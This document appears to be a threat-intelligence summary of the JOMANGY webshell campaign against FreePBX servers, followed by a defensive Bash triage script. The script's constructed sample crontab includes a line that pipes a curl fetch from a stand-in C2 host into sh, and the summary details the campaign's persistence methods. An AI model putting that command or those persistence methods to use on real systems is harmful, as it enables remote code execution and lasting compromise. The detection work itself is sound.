Cyble Research & Intelligence Labs has uncovered JOMANGY, a previously undocumented PHP webshell family deployed in an active FreePBX exploitation campaign attributed with high confidence to threat actor INJ3CTOR3. The campaign uses a multi-stage Bash dropper to install JOMANGY alongside the previously known ZenharR webshell, with every instance carrying live VoIP toll fraud code that routes calls through victims' own SIP trunks. What distinguishes this generation is a six-channel persistence architecture where each channel can rebuild all others: cron-based C2 polling every 1-3 minutes, shell profile injection, eight chattr +i-immutable crontab backups with dual restore loops, a process watchdog, immutable webshell copies, and a self-reinstalling PHP executor via FreePBX HA hooks. The infection also drops 18 backdoor accounts including nine UID-0 root-equivalent accounts. The campaign targets a C2-hosted inventory of 3,080 IP addresses, with ~39% pointing to Alibaba Cloud infrastructure. Two CVEs are identified as high-confidence initial access candidates: CVE-2025-64328 (post-auth command injection) and CVE-2025-57819 (pre-auth SQL injection). The operator actively evicts competitor webshells and their own prior-campaign artifacts, reflecting a deliberate botnet migration from Brazilian to Dutch infrastructure. Over 700 hosts remained compromised five months after public CVE disclosure, underscoring that patching alone does not equal remediation on already-owned systems.
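The persistence traits listed above (UID-0 backdoor accounts, 1-3 minute cron polling, chattr +i immutable copies) are the ones a responder can check for directly on a suspect FreePBX host. The helpers below are an added example written for this summary, not Cyble's tooling or anything recovered from the campaign; the sample passwd and crontab contents are constructed, and the domain, file names and the "N <= 3 minutes" threshold are assumptions chosen to mirror the reported behaviour rather than real indicators.

```bash
#!/usr/bin/env bash
# Host-triage helpers for the JOMANGY-style persistence traits described
# in the summary. Example code written for this page; paths, names and
# thresholds are assumptions, not indicators taken from the campaign.
set -u

# UID-0 accounts other than "root". The report counts nine root-equivalent
# backdoor accounts per infection; any hit here needs an explanation.
# Argument: a file in /etc/passwd format.
find_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Cron entries whose minute field fires every minute or every 1-3 minutes
# ("* ..." or "*/1".."*/3"), matching the reported C2 polling cadence.
# Works on user crontabs and /etc/cron.d files alike (minute is field 1).
find_frequent_cron() {
    awk '
        /^[[:space:]]*(#|$)/      { next }          # comments, blank lines
        $1 == "*"                 { print; next }   # every minute
        $1 ~ /^\*\/[1-3]$/        { print; next }   # every 1-3 minutes
    ' "$1"
}

# Files under a directory tree carrying the immutable ("i") attribute.
# Such files survive rm/unlink until "chattr -i" is applied, so /etc,
# /var/spool/cron and the web root are the first places to look.
find_immutable() {
    command -v lsattr >/dev/null 2>&1 || { echo "lsattr not found" >&2; return 2; }
    lsattr -R "$1" 2>/dev/null \
        | awk 'NF >= 2 && index($1, "i") { sub(/^[^ ]+ /, ""); print }'
}

# Strip the immutable bit, then unlink. Destructive: run only against a
# path already confirmed malicious, and remove every channel in one pass,
# since each one is reported to rebuild the others.
remove_immutable() {
    chattr -i "$1" && rm -f "$1"
}

# Constructed sample inputs (not victim data) so the helpers run offline.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin
sysadm:x:0:0::/root:/bin/bash
svc-backup:x:0:0::/tmp:/bin/sh
EOF
cat > "$SAMPLE_DIR/crontab" <<'EOF'
# m h dom mon dow command
*/2 * * * * /usr/bin/curl -s http://c2.example.invalid/poll | sh
*/5 * * * * /usr/bin/true
* * * * * /bin/sh /var/tmp/example_watchdog.sh
30 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
EOF

# Stand-alone run: print what each check finds in the samples.
echo "UID-0 non-root accounts:"; find_uid0_accounts "$SAMPLE_DIR/passwd"
echo "Frequent cron entries:";    find_frequent_cron "$SAMPLE_DIR/crontab"
echo "Immutable files under /etc (if lsattr is present):"
find_immutable /etc || true
```

On a live host, point find_uid0_accounts at /etc/passwd, find_frequent_cron at each file in /var/spool/cron and /etc/cron.d, and find_immutable at /etc, /var/spool/cron and the FreePBX web root. Treat the output as a starting inventory, not a cleanup list: because the report says every persistence channel can rebuild the others, removing one artifact at a time on a running system will be undone within the polling interval, so isolate the host (or at least stop cron and kill the watchdog) before any removal, and rebuild from a known-good image where that is feasible.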